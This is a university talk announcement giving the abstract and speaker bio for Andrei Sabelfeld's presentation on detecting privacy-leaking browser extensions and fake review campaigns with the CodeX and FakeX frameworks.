Professor Andrei Sabelfeld - Digital Security
Date: - Location: Eurecom
Abstract: Browser extensions put millions of users at risk when misusing their elevated privileges. Despite the current practices of semi-automated code vetting, malicious extensions still thrive in the official stores. This talk presents recent work on two critical threats in the browser extension ecosystem: privacy leaks and reputation manipulation. First, we introduce CodeX, a CodeQL-driven static analysis framework for analyzing browser extensions. CodeX uncovers privacy violations in real-world extensions that leak cookies, browsing history, and bookmarks. Our empirical study exposes 212 privacy-violating extensions, impacting up to 3.6M users. Next, we present FakeX, a framework for detecting fake review campaigns designed to manipulate extension reputations and evade store defenses. FakeX incorporates temporal distribution analysis, relationship clustering, and ratio-based assessment of reviews. By analyzing over 1.7 million reviews, FakeX exposes sophisticated fake review networks and leads to the discovery of 86 malicious extensions, mounting attacks that range from data-stealing to monetization, impacting over 64 million users. In addition, we collaborate with Adblock Plus and Avast to demonstrate FakeX in action, expanding a seed list of newly detected malicious extensions to discover a further 16 malicious extensions with millions of users. The talk is based on papers published in ASIACCS’24 (joint work with E. Olsson, B.Eriksson, P. Picazo-Sanchez, and L. Andersson) and CODASPY’25 (joint work with M. Ahmadpanah, M. Gobbi, D. Hedin, and J. Kinder). Short bio: Andrei Sabelfeld is Professor at Chalmers University of Technology, Visiting Professor at KTH, and, previously, Researcher at Cornell University in Ithaca, NY, USA. Andrei’s research spans from foundations to applications in a range of topics including software security, web security, IoT security, security foundations, and applied cryptography. He is a recipient of a number of prestigious prizes and awards from ERC, KAW, SSF, VR, WASP, Chalmers, Google, Amazon, Meta (Facebook), and OpenAI.